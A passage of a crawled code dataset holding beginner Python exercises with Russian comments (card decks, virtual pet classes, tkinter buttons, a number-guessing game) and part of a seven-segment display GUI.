'Рука': набор карт на руках у одного игрока \"\"\"\n def __init__(self):\n self.cards = []\n\n def __str__(self):\n if self.cards:\n rep = \"\"\n for card in self.cards:\n rep += str(card) + \"\\t\"\n else:\n rep = \"<пусто>\"\n\n return rep\n\n def clear(self):\n \"\"\" Очистить руку \"\"\"\n self.cards = []\n\n def add(self, card):\n \"\"\" Добавление карты \"\"\"\n self.cards.append(card)\n\n def give(self, card, other_hand):\n \"\"\" Отдать карты \"\"\"\n self.cards.remove(card)\n other_hand.add(card)\n\nclass Deck(Hand):\n \"\"\" Колода игральных карт \"\"\"\n def populate(self):\n \"\"\" Формирование колоды \"\"\"\n self.cards = []\n for suit in Card.SUITS:\n for rank in Card.RANKS:\n self.add(Card(rank, suit))\n\n def shuffle(self):\n \"\"\" Перемешивание колоды, переставление карт в случайном порядке \"\"\"\n import random\n random.shuffle(self.cards)\n\n def deal(self, hands, per_hand = 1):\n \"\"\" Расдача карт \"\"\"\n for round in range(per_hand):\n for hand in hands:\n if self.cards:\n top_card = self.cards[0]\n self.give(top_card, hand)\n else:\n print(\"Не могу больше сдавать: карты кончились!\")\n\n# основная часть\ndeck1 = Deck()\nprint(\"Создана новая колода.\")\nprint(\"Вот эта колода: \")\nprint(deck1)\ndeck1.populate()\nprint(\"\\nВ колоде появились карты.\")\nprint(\"Вот как она выглядит теперь: \")\nprint(deck1)\ndeck1.shuffle()\nprint(\"\\nКолода перемешена\")\nprint(\"Вот как она выглядит теперь: \")\nprint(deck1)\nmy_hand = Hand()\nyour_hand = Hand()\nhands = [my_hand, your_hand]\n# раздадим в кадую руку по 5 карт\ndeck1.deal(hands, per_hand=5)\nprint(\"\\nМне и Вам на руки роздано по 5 карт.\")\nprint(\"У меня на руках: \")\nprint(my_hand)\nprint(\"У Вам на руках: \")\nprint(your_hand)\nprint(\"В колоде осталось: \")\nprint(deck1)\n\ndeck1.clear()\nprint(\"Колода очищена\")\nprint(\"Вот как она выглядит теперь: \")\nprint(deck1)\ninput(\"\\n\\nPress the enter key to exit.\")" }, { "alpha_fraction": 0.7460317611694336, "alphanum_fraction": 0.7460317611694336, "avg_line_length": 20.33333396911621, "blob_id": "3d4e71d0db4b0544e9cf18c1d31700823e2d1902", "content_id": "c3436cd41265b9d8f015c7d81cfc5c6f5eddb2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 34, "num_lines": 3, "path": "/GameOver.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# GameOver\nprint(\"GameOver\")\ninput(\"Нажите Enter, чтобы выйти\")" }, { "alpha_fraction": 0.6144958138465881, "alphanum_fraction": 0.6144958138465881, "avg_line_length": 21.690475463867188, "blob_id": "e9c2c2ba5e96d86171df9f07a4acb59b2efea7d7", "content_id": "0316ab5d506a511d8ca026c76c94801b98a28d92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1244, "license_type": "no_license", "max_line_length": 62, "num_lines": 42, "path": "/OOP/property_critter.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Демонстрирует работу со свойствами\nclass Critter(object):\n \"\"\" Виртуальный питомец \"\"\"\n def __init__(self, name):\n print(\"Появилась на свет новая зверюшка\")\n self.__name = name\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, new_name):\n if new_name == \"\":\n print(\"Имя зверюшки на может быть пустой строкой\")\n else:\n self.__name = new_name\n print(\"Имя успешно изменено.\")\n\n def talk(self):\n print(\"\\nПривет! Меня зовут \", self.name)\n\n# основная часть\ncrit = Critter(\"Бобик\")\ncrit.talk()\n\nprint(\"Мою зверюшку зовут \", end=\" \")\nprint(crit.name)\n\nprint(\"Пытаюсь изменить имя на - 'Джекки'\")\ncrit.name = \"Джекки\"\n\nprint(\"Мою зверюшку зовут \", end=\" \")\nprint(crit.name)\n\nprint(\"Пытаюсь изменить имя на пустую строку\")\ncrit.name = \"\"\n\nprint(\"Мою зверюшку зовут \", end=\" \")\nprint(crit.name)\n\ninput(\"\\nНажмите Enter, чтобы выйти!\")" }, { "alpha_fraction": 0.664160430431366, "alphanum_fraction": 0.6741854548454285, "avg_line_length": 24, "blob_id": "5b1609b9d1b61c3998403015b7d033c19a800d71", "content_id": "df91d80cd75da82b8c847cbb872207dc9646714a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/OOP/constructor_critter.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Зверюшка с конструктором\n# Демонстрирует метод-конструктор\nclass Critter(object):\n \"\"\" Виртуальный питомец \"\"\"\n def __init__(self):\n print(\"Появилась на свет новая зверюшка!\")\n\n def talk(self):\n print(\"\\nПривет! Я зверюшка - экземпляр класса Critter.\")\n\n# Основная часть\ncrit1 = Critter()\ncrit2 = Critter()\ncrit1.talk()\ncrit2.talk()\ninput(\"\\n\\nPress the Enter key to exit.\")" }, { "alpha_fraction": 0.5674974322319031, "alphanum_fraction": 0.5841121673583984, "avg_line_length": 22.487804412841797, "blob_id": "fcf1efef938f105a1437b04e8ae25795b0bda906", "content_id": "7513bc9702ddf3713dbb9830b38f818dfbc635b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2306, "license_type": "no_license", "max_line_length": 70, "num_lines": 82, "path": "/OOP/playing_cards.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Карты\n# Демонстрирует сочетание объектов\nclass Card(object):\n \"\"\" Одна игральая карта \"\"\"\n RANKS = [\"A\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"J\",\"Q\",\"K\"]\n SUITS = [\"c\",\"d\",\"h\",\"s\"]\n\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def __str__(self):\n rep = self.rank + self.suit\n return rep\n\nclass Hand(object):\n \"\"\" 'Рука': набор карт на руках у одного игрока \"\"\"\n def __init__(self):\n self.cards = []\n\n def __str__(self):\n if self.cards:\n rep = \"\"\n for card in self.cards:\n rep += str(card) + \" \"\n else:\n rep = \"<пусто>\"\n\n return rep\n\n def clear(self):\n \"\"\" Очистить руку \"\"\"\n self.cards = []\n\n def add(self, card):\n \"\"\" Добавление карты \"\"\"\n self.cards.append(card)\n\n def give(self, card, other_hand):\n \"\"\" Отдать карты \"\"\"\n self.cards.remove(card)\n other_hand.add(card)\n\n# основная часть\ncard1 = Card(rank=\"A\", suit=\"c\")\nprint(\"Вывожу на экран объект-карту\")\nprint(card1)\ncard2 = Card(rank=\"2\", suit=\"c\")\ncard3 = Card(rank=\"3\", suit=\"c\")\ncard4 = Card(rank=\"4\", suit=\"c\")\ncard5 = Card(rank=\"5\", suit=\"c\")\nprint(\"\\nВывод ещё четырёх карт\")\nprint(card2)\nprint(card3)\nprint(card4)\nprint(card5)\n\nmy_hand = Hand()\nprint(\"\\nПечатаю карты, которые у меня на руках до раздачи\")\nprint(my_hand)\n\nmy_hand.add(card1)\nmy_hand.add(card2)\nmy_hand.add(card3)\nmy_hand.add(card4)\nmy_hand.add(card5)\nprint(\"\\nПечатаю карты, которые у меня на руках после раздачи\")\nprint(my_hand)\n\nyou_hand = Hand()\nmy_hand.give(card1, you_hand)\nmy_hand.give(card2, you_hand)\nprint(\"\\nПервые две из моих я передал вам:\")\nprint(\"Теперь у вас на руках\")\nprint(you_hand)\nprint(\"А у меня на руках\")\nprint(my_hand)\n\nmy_hand.clear()\nprint(\"\\nУ меня на руках после того, как я сбросил все карты:\")\nprint(my_hand)\ninput(\"\\n\\nНажмите Enter, чтобы выйти\")\n" }, { "alpha_fraction": 0.6341189742088318, "alphanum_fraction": 0.6464646458625793, "avg_line_length": 30.85714340209961, "blob_id": "57b3524fa995450ce656ac3751f17c13e951e3d1", "content_id": "41213bf621a1812629264fecaaec84dd17858bd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 96, "num_lines": 28, "path": "/instructions.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Инструкция\n# Демонстрирует, как создавать собственные функции\ndef instructions():\n \"\"\" Выводит на экран инструкцию для игрока \"\"\"\n print(\n \"\"\"\n Добро пожаловать на ринг грандиознейших ителлектуальных состязаний всех времён.\n Твой мозг и мой процессор сойдутся в схватке за доской игры \"Крестики-нолики\".\n Чтобы сделать ход, введи число от 0 до 8. Числа однозначно соответствуют полям\n доски - так, как показано ниже:\n\n 0 | 1 | 2\n ---------\n 3 | 4 | 5\n ---------\n 6 | 7 | 8\n\n Приготовься к бою, жалкий бестолковый человечишка! Вот-вот начнется решающее сражение.\\n\n \"\"\"\n )\n\n# основная часть\nprint(\"Это инструкция для игры в 'Крестики-нолики'.\")\ninstructions()\nprint(\"Это опять та же самая инструкция: \")\ninstructions()\nprint(\"Надеюсь теперь смысл игры ясен.\")\ninput(\"Press the enter key to exit!\")" }, { "alpha_fraction": 0.5836177468299866, "alphanum_fraction": 0.5995449423789978, "avg_line_length": 24.882352828979492, "blob_id": "0ae71fd0d58d52456c41f82320dd2e4573176ec4", "content_id": "5d918f21ebd0724762f24a4ee5bbc03a1e53981a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1075, "license_type": "no_license", "max_line_length": 70, "num_lines": 34, "path": "/OOP/GUI/simple_gui2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Демонстрирует создание класса в оконном приложении на основе tkinter\nfrom tkinter import *\n\nclass Application(Frame):\n \"\"\" GUI-приложение с тремя кнопками \"\"\"\n\n def __init__(self, master):\n \"\"\" Инициализирует рамку \"\"\"\n super(Application, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Создание кнопок \"\"\"\n # первая кнопка\n self.btn1 = Button(self, text=\"Я ничего не делаю!\")\n self.btn1.grid()\n # вторая кнопка\n self.btn2 = Button(self)\n self.btn2.grid()\n self.btn2.configure(text=\"И я тоже!\")\n # третья кнопка\n self.btn3 = Button(self)\n self.btn3.grid()\n self.btn3[\"text\"] = \"И я!\"\n\n# основная часть\nroot = Tk()\nroot.title(\"Работа с кнопками\")\nroot.geometry(\"200x150\")\n\napp = Application(root)\n\nroot.mainloop()" }, { "alpha_fraction": 0.700564980506897, "alphanum_fraction": 0.7163841724395752, "avg_line_length": 30.64285659790039, "blob_id": "1763832be56814923a6d1fb8552e1b7bf2696170", "content_id": "5254f7976cacaf97a5fbd3ad954f074ef479521b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1315, "license_type": "no_license", "max_line_length": 89, "num_lines": 28, "path": "/guess_my_number.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Отгадай число\n#\n# Компьютер выбирает случайное число в диапазоне от 1 до 100\n# Игрок пытается отгадать это число\n# Компьютер говорит предположение больше/меньше чем загаданное число или число - отгадано\nimport random\n\nprint(\"\\tДобро пожаловать в игру 'Отгадай число'!\")\nprint(\"\\nЯ загадал натуральное число из диапазона от 1 до 100\")\nprint(\"Постарайтесь отгадать его за минимальное количество попыток.\\n\")\n\n# начальные значения\nthe_number = random.randint(1, 100)\nguess = int(input(\"Ваше предположение: \"))\ntries = 1\n\n# цикл отгадывания\nwhile guess != the_number:\n if guess > the_number:\n print(\"Меньше...\")\n else:\n print(\"Больше...\")\n guess = int(input(\"Ваше предположение: \"))\n tries += 1\n\nprint(\"\\nВам удалось отгадать число! Это в самом деле \", the_number)\nprint(\"Вы затратили на отгадывание \", tries, \" попыток!\\n\")\ninput(\"Press the enter key to exit\")" }, { "alpha_fraction": 0.3461891710758209, "alphanum_fraction": 0.35078054666519165, "avg_line_length": 21.244897842407227, "blob_id": "88045ec712522b2ec6da7c0aca9e8d6a30308ab7", "content_id": "444a6152e39a4b82f32cd87451f0529c47fa2522", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1331, "license_type": "no_license", "max_line_length": 85, "num_lines": 49, "path": "/mood_computer.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Компьютерный датчик настроения\n# Демонстрирует работу условного оператора if: ... elif: ... else:\nimport random\nprint(\"Я ощущаю Вашу энергетику. От моего экрана не скрыто ни одно из Ваших чувств.\")\nprint(\"Итак. Ваше настроение...\")\nmood = random.randint(1,3)\nif mood == 1:\n # радостное\n print(\n \"\"\"\n ___________\n | |\n | O O |\n | < |\n | , , |\n | ... |\n |__________|\n \"\"\"\n )\nelif mood == 2:\n # так себе\n print(\n \"\"\"\n ___________\n | |\n | O O |\n | < |\n | |\n | ..... |\n |__________|\n \"\"\"\n )\nelif mood == 3:\n # прескверное\n print(\n \"\"\"\n ___________\n | |\n | O O |\n | < |\n | .. |\n | .. .. |\n |__________|\n \"\"\"\n )\nelse:\n print(\"Не бывает такого настроения! (Должно быть, Вы совершенно не в себе.)\")\n print(\"...Но это только сегодня.\")\n input(\"\\n\\nPress the enter key to exit.\")" }, { "alpha_fraction": 0.7047619223594666, "alphanum_fraction": 0.7166666388511658, "avg_line_length": 34.08333206176758, "blob_id": "222d5257736a4cc893da56594aa0a61c81a8e11c", "content_id": "58ea001ed5ba5ad92dd335d5d684625f0ba40956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 547, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/ORWCFile/write_it.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Запишем\n# демонстрирует запись в текстовый файл\nprint(\"Создаю текстовый файл методом write()\")\ntext_file = open(\"write_it.txt\", \"w\", encoding='utf-8')\ntext_file.write(\"Строка 1\\n\")\ntext_file.write(\"Это строка 2\\n\")\ntext_file.write(\"Этой строке достался номер 3\\n\")\ntext_file.close()\nprint(\"\\nЧитаю вновь созданный файл\")\ntext_file = open(\"write_it.txt\", \"r\", encoding='utf-8')\nprint(text_file.read())\ntext_file.close()" }, { "alpha_fraction": 0.6361867785453796, "alphanum_fraction": 0.6449416279792786, "avg_line_length": 31.15625, "blob_id": "e39721698dbf874a99a04345aa0f4fc602758160", "content_id": "ce508dcf20b15a68bd020a3f69711abd82516c6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1352, "license_type": "no_license", "max_line_length": 86, "num_lines": 32, "path": "/OOP/GUI/click_counter.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Счётчик нажатий\n# Демонстрирует связывание событий с обработчиками\nfrom tkinter import *\n\nclass Application(Frame):\n \"\"\" GUI-приложение, которое подсчитывает количество нажатий кнопки \"\"\"\n def __init__(self, master):\n \"\"\" Инициализирует рамку \"\"\"\n super(Application, self).__init__(master)\n self.grid()\n # кол-во нажатий\n self.btn_clicks = 0\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Создает кнопку, на которой отображается количество совершённых нажатий \"\"\"\n self.btn = Button(self)\n self.btn[\"text\"] = \"Количество щелчков: 0\"\n self.btn[\"command\"] = self.update_count\n self.btn.grid()\n\n def update_count(self):\n \"\"\" Увеличивает количество нажатий кнопки на единицу и отображает его \"\"\"\n self.btn_clicks += 1\n self.btn[\"text\"] = \"Количество щелчков: \" + str(self.btn_clicks)\n\n# основная часть\nroot = Tk()\nroot.title(\"Количество нажатий\")\nroot.geometry(\"300x250\")\napp = Application(root)\nroot.mainloop()" }, { "alpha_fraction": 0.7129186391830444, "alphanum_fraction": 0.7129186391830444, "avg_line_length": 37.09090805053711, "blob_id": "4fd220d1ae91061b7fba7bf4b4a6cc05144919fb", "content_id": "36170bb45e4df59fa2231c50b077a209f8d66525", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 565, "license_type": "no_license", "max_line_length": 75, "num_lines": 11, "path": "/no_vowels.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Только согласные\n# Демонстрирует, как создавать новые строки из исходных с помощью цикла for\nmessage = input(\"Введите текст: \")\nnew_message = \"\"\nVOWELS = \"aeiouaеёиоуыэюя\"\nfor letter in message:\n if letter.lower() not in VOWELS:\n new_message += letter\n print(\"Создана новая строка: \", new_message)\nprint(\"\\nВот ваш текст с изятыми гласными буквами: \", new_message)\nprint(\"\\nPress the enter to exit\")" }, { "alpha_fraction": 0.714525580406189, "alphanum_fraction": 0.7162048816680908, "avg_line_length": 31.216217041015625, "blob_id": "187045dbfc3dd910eba8ab4f31f4cb2c2f9317d2", "content_id": "e5b3c8eb801a0b06725c650cf2d4b5163eadd0b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 81, "num_lines": 37, "path": "/hero's_inventory2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Арсенал героя 2.0\n# Демонстрирует работу с кортежами\n# Создадим кортеж с несколькими элементами и выведем его с помощью цикла for\ninventory = (\n \"меч\",\n \"кольчуга\",\n \"щит\",\n \"целебное снадобье\"\n)\n\nprint(\"\\nИтак, в Вашем арсенале: \")\nfor item in inventory:\n print(item)\ninput(\"\\nPress the enter key to exit\")\n\n#найдем длину кортежа\nprint(\"\\nСейчас в Вашем распоряжении \", len(inventory), \" предмета/-ов.\")\ninput(\"\\nPress the enter key to exit\")\n\n# Вывод одного предмета с определенным индексом\nindex = int(input(\"\\nВведите индекс одного из предметов арсенала: \"))\nprint(\"Под индексом \", index, \" в арсенале находится \", inventory[index])\n\n# отобразим срез\nstart = int(input(\"\\nВведите начальный индекс среза: \"))\nfinish = int(input(\"\\nВведите конечный индекс среза: \"))\nprint(\"Срез inventory[\", start, \":\", finish, \"] - это \", inventory[start:finish])\ninput(\"\\nPress the enter key to exit\")\n\n# соединим два кортежа\nchest = (\"золото\", \"драгоценные камни\")\nprint(\"Вы нашди ларец. Его содержимое: \", chest)\nprint(\"Вы приобщили содержимое ларца к своему арсеналу.\")\ninventory += chest\nprint(\"Теперь в вашем распоряжении: \")\nprint(inventory)\ninput(\"\\nPress the enter key to exit\")" }, { "alpha_fraction": 0.7144970297813416, "alphanum_fraction": 0.7352070808410645, "avg_line_length": 18.342857360839844, "blob_id": "db05714c6f29bea055679efb7a0538f4b8060ea9", "content_id": "8fb9319b72b6817948352b62786233547fc5edbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "no_license", "max_line_length": 61, "num_lines": 35, "path": "/OOP/GUI/simple_gui.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Простейший GUI\n# Демонстрирует создание окна\nfrom tkinter import *\n\n# создание окна\nroot = Tk()\n\n# изменение окна\nroot.title(\"Простейший GUI\")\nroot.geometry(\"200x100\")\n\n# внутри окна создается рамка для размещения других элементов\napp = Frame(root)\napp.grid()\n\n# создание метки внутри рамки\nlbl = Label(app, text=\"Тестовая метка\")\nlbl.grid()\n\n# создание первой кнопки внутри рамки\nbtn1 = Button(app, text=\"Ничего не делаю!\")\nbtn1.grid()\n\n# создание второй кнопки внутри рамки\nbtn2 = Button(app)\nbtn2.grid()\nbtn2.configure(text=\"И я тоже\")\n\n# создание третьей кнопки внутри рамки\nbtn3 = Button(app)\nbtn3.grid()\nbtn3[\"text\"] = \"И я!\"\n\n# старт событийного цикла\nroot.mainloop()" }, { "alpha_fraction": 0.6356107592582703, "alphanum_fraction": 0.6501035094261169, "avg_line_length": 41.0217399597168, "blob_id": "0864af14ed0d49dcda394e790915c00be5d850c7", "content_id": "f9b4280683c8b2aa845d39b5026eae4f17c3a2cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2438, "license_type": "no_license", "max_line_length": 125, "num_lines": 46, "path": "/OOP/GUI/movie_chooser2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# киноман-2\n# Демонстрирует переключатель\nfrom tkinter import *\n\nclass Application(Frame):\n \"\"\" GUI-приложение, позволяющее выбрать один любимый жанр кино \"\"\"\n def __init__(self, master):\n super(Application, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Создает элементы, с помощью которых пользователь будет выбирать \"\"\"\n # Метка описание\n Label(self, text=\"Укажите ваш любимый жанр кино\").grid(row=0, column=0, sticky=W)\n # Метка-инструкиця\n Label(self, text=\"Выберите ровно один:\").grid(row=1, column=0, sticky=W)\n # переменная для хранения сведений о единственном любимом жанре\n self.favorite = StringVar()\n self.favorite.set(None)\n # положение \"Комедия\" переключателя\n Radiobutton(self, text=\"Комедия\", variable=self.favorite, value=\"комедия.\", command=self.update_text).grid(\n row=2, column=0, sticky=W)\n # положение \"Драма\" переключателя\n Radiobutton(self, text=\"Драма\", variable=self.favorite, value=\"драма.\", command=self.update_text).grid(\n row=3, column=0, sticky=W)\n # положение \"Кино о любви\" переключателя\n Radiobutton(self, text=\"Кино о любви\", variable=self.favorite, value=\"кино о любви.\", command=self.update_text).grid(\n row=4, column=0, sticky=W)\n # текстовая область с результатами\n self.resut_text = Text(self, width=40, height=5, wrap=WORD)\n self.resut_text.grid(row=5, column=0, columnspan=3)\n\n def update_text(self):\n \"\"\" Обновляя текстовую область, вписывает в нее любимый жанр \"\"\"\n message = \"Ваш любимый киножанр: \"\n message += self.favorite.get()\n self.resut_text.delete(0.0, END)\n self.resut_text.insert(0.0, message)\n\n# Основная частт\nroot = Tk()\nroot.title(\"Киноман-2\")\nroot.geometry(\"350x150\")\napp = Application(root)\nroot.mainloop()" } ]
17
jsmlau/seven-segment-display-gui
https://github.com/jsmlau/seven-segment-display-gui
07132a55a95da9746a13065a58ba350bf7ccfdd6
fcb777ebe92cb86188d514556e622708152be4d1
1333b161da49551fd6e3b87c117c18c3e0d69328
refs/heads/master
2022-11-26T08:19:59.829496
2020-07-31T18:30:39
2020-07-31T18:30:39
283,948,756
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5093961954116821, "alphanum_fraction": 0.5195151567459106, "avg_line_length": 37.76293182373047, "blob_id": "a6e442ce587cc5503c57c839a15a60c47658206b", "content_id": "b6ea3c880ebaad8a02116ab984a0a89303318812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8994, "license_type": "no_license", "max_line_length": 97, "num_lines": 232, "path": "/seven_segment_display_gui.py", "repo_name": "jsmlau/seven-segment-display-gui", "src_encoding": "UTF-8", "text": "\"\"\"\nA Seven-Segment Display in a GUI.py\n\nCreated by Jas Lau on 7/30/19.\nCopyright © 2019 Jas Lau. All rights reserved.\n\"\"\"\nimport tkinter as tk\nimport tkinter.messagebox as tkmb\nimport seven_segment_logic as ssl\n\n\n# ================================ Client (As a Function) ================================\n\ndef main():\n root_win = tk.Tk()\n demo_cls_ref = SevenSegmentGUI(root_win)\n demo_cls_ref.get_root().title(\"Seven Segment Display\")\n demo_cls_ref.get_root().mainloop()\n\n\n# ============================== End of Client (As a Function) ==============================\n\n# =================================== SevenSegmentGUI Class =================================\n\nclass SevenSegmentGUI:\n INITIAL_DIG = 0\n INITIAL_CAN_WIDTH = 250\n INITIAL_CAN_HEIGHT = 300\n HILITE_PAD = 0\n # add\n BAD_USER_INPUT = -1\n MIN_NUM = 0\n MAX_NUM = 15\n\n # constructor\n def __init__(self, master_root=None):\n # our member to support the ssl\n self.sev_seg_logic = ssl.SevenSegmentLogic()\n # define digit to display that can be overwritten by user\n self.digit_to_show = self.INITIAL_DIG\n\n # set up mutable width and height for resizing\n self.canvas_width = self.INITIAL_CAN_WIDTH\n self.canvas_height = self.INITIAL_CAN_HEIGHT\n\n # -------------- store root reference locally --------------\n if not self.set_root(master_root):\n stand_in = tk.Tk()\n self.set_root(stand_in)\n\n # --------- a container frame and subframes ----------------\n self.container = tk.Frame(self.root, bg=\"ghostwhite\", padx=10, pady=10)\n self.title_frame = tk.Frame(self.container, bg=\"ghostwhite\")\n self.work_frame = tk.Frame(self.container, bg=\"ghostwhite\")\n self.canvas_frame = tk.Frame(self.container, bg=\"gray3\", padx=3, pady=3)\n\n # -------------- one message widget ------------------------\n header = \"Enter a hex digit to display (0-9, A-F)\"\n self.msg_head = tk.Message(self.title_frame, text=header)\n self.msg_head.config(font=(\"Helvetica Neue\", 11), bg=\"ghostwhite\",\n width=300)\n\n # ----------------- some label widgets ------------------\n self.lab_digit = tk.Label(self.work_frame, text=\"Digit:\", padx=20,\n pady=10, bg=\"ghostwhite\")\n\n # ----------------- some entry widgets ------------------\n self.enter_digit = tk.Entry(self.work_frame)\n self.enter_digit.insert(0, str(self.digit_to_show))\n # add\n # Binding the self.update_canvas event handler to a <Return> event in\n # the entry field.\n self.enter_digit.bind(\"<Return>\", self.update_canvas)\n\n # ----------------- the canvas widget ------------------\n self.canvas = tk.Canvas(self.canvas_frame, width=self.canvas_width,\n height=self.canvas_height, bg=\"gray3\",\n highlightthickness=self.HILITE_PAD)\n\n # ------- place widgets using pack and grid layout ---------\n self.container.pack(expand=True, fill=tk.BOTH)\n self.canvas_frame.pack(side=\"right\", expand=True, fill=tk.BOTH)\n self.title_frame.pack(expand=True, fill=tk.BOTH)\n self.work_frame.pack(expand=True, fill=tk.BOTH)\n self.canvas.pack(expand=True, fill=tk.BOTH)\n self.msg_head.pack(expand=True, fill=tk.BOTH)\n\n self.lab_digit.grid(row=0, column=0, sticky=tk.E)\n self.enter_digit.grid(row=0, column=1, sticky=tk.W)\n\n # -- update dimensions when resized (including 1st time) --\n self.canvas.bind(\"<Configure>\", self.resize_can)\n\n # mutators\n def set_root(self, rt):\n if self.valid_tk_root(rt):\n self.root = rt\n return True\n # else\n return False\n\n def set_title(self, title):\n if type(title) == str:\n self.root.title = title\n return True\n # else\n return False\n\n # accessor\n def get_root(self):\n return self.root\n\n # static helper\n @staticmethod\n def valid_tk_root(am_i_a_root):\n if type(am_i_a_root) == tk.Tk:\n return True\n # else\n return False\n\n # bound event handler gets new dimensions and redraws when resized\n def resize_can(self, event):\n # without 2 * hi-light pad, get runaway window\n self.canvas_width = float(event.width) - (2 * self.HILITE_PAD)\n self.canvas_height = float(event.height) - (2 * self.HILITE_PAD)\n\n # change the size, then redraw everything (alt: Canvas's scale())\n self.canvas.configure(width=self.canvas_width, height=self.canvas_height)\n self.update_canvas()\n\n @classmethod\n def convert_hex_char_to_int(cls, input_val):\n try:\n if type(input_val) is not str or len(input_val) != 1:\n return cls.BAD_USER_INPUT\n ret_int = int(input_val, 16)\n except ValueError:\n return cls.BAD_USER_INPUT\n else:\n return ret_int\n\n @classmethod\n def valid_input(cls, input_val):\n if not (cls.MIN_NUM <= input_val <= cls.MAX_NUM):\n return False\n return True\n\n # canvas updater\n def update_canvas(self, *args):\n self.canvas.delete(\"all\")\n CLICK = .02\n CAP = .0175\n LEN = .3\n TL_X = .35\n TL_Y = .15\n SLANT = .04 # range that looks fair: 0.0 - 0.07)\n\n # for a shorter xy_func_list[] definition\n vert_func = self.draw_vert_seg\n horiz_func = self.draw_horiz_seg\n\n # list consisting of (x, y, function) for each segment a - g\n xy_func_list = [\n # seg a\n (TL_X + CLICK, TL_Y, horiz_func),\n # seg b\n (TL_X + LEN + 2 * CAP + 2 * CLICK, TL_Y, vert_func),\n # seg c\n (TL_X - SLANT + LEN + (2. * CAP) + (2. * CLICK),\n TL_Y + LEN + (2. * CAP), vert_func),\n # seg d\n (TL_X - (2 * SLANT) + CLICK, TL_Y + (2 * LEN) + (4 *\n CAP), horiz_func),\n # seg e\n (TL_X - SLANT, TL_Y + LEN + (2. * CAP), vert_func),\n # seg f\n (TL_X, TL_Y, vert_func),\n # seg g\n (TL_X - SLANT + CLICK, TL_Y + LEN + (2. * CAP), horiz_func)\n ]\n\n simulated_user_str = self.enter_digit.get()\n # convert from hex to int\n user_int = self.convert_hex_char_to_int(simulated_user_str)\n\n # SSL turns any error/exception into \"E\" for display,\n # so out-of-range ints that pass above will be displayed as \"E\"\n if not self.valid_input(user_int):\n # Show Error Message\n tkmb.showerror(\"Input Error\", \"Single (Hex) Digits (as a string) \"\n \"Only, Please.\")\n self.sev_seg_logic.eval(14)\n\n # else if it is in range\n elif self.valid_input(user_int):\n self.sev_seg_logic.eval(user_int)\n\n # draw each segment using draw() method in xy_func_list[k][2]()\n for k in range(7):\n if self.sev_seg_logic.get_val_of_seg(k):\n xy_func_list[k][2](xy_func_list[k][0], xy_func_list[k][1], LEN,\n CAP, SLANT)\n\n def draw_vert_seg(self, x, y, length, end, slant):\n # tall, narrow hexagon\n points = [x * self.canvas_width, y * self.canvas_height, (x - end) * self.canvas_width,\n (y + end) * self.canvas_height, (x - end - slant) * self.canvas_width,\n (y + end + length) * self.canvas_height, (x - slant) * self.canvas_width,\n (y + length + (2 * end)) * self.canvas_height,\n (x + end - slant) * self.canvas_width, (y + end + length) * self.canvas_height,\n (x + end) * self.canvas_width, (y + end) * self.canvas_height]\n self.canvas.create_polygon(points, fill=\"orange red\", width=0)\n\n def draw_horiz_seg(self, x, y, length, end, dummy=None):\n \"\"\" last param is to make signature match draw_vert_seg()\n for next phase -- horiz segs don\"t have slants \"\"\"\n # long, thin hexagon\n points = [x * self.canvas_width, y * self.canvas_height, (x + end) * self.canvas_width,\n (y + end) * self.canvas_height, (x + end + length) * self.canvas_width,\n (y + end) * self.canvas_height, (x + length + (2 * end)) * self.canvas_width,\n y * self.canvas_height, (x + end + length) * 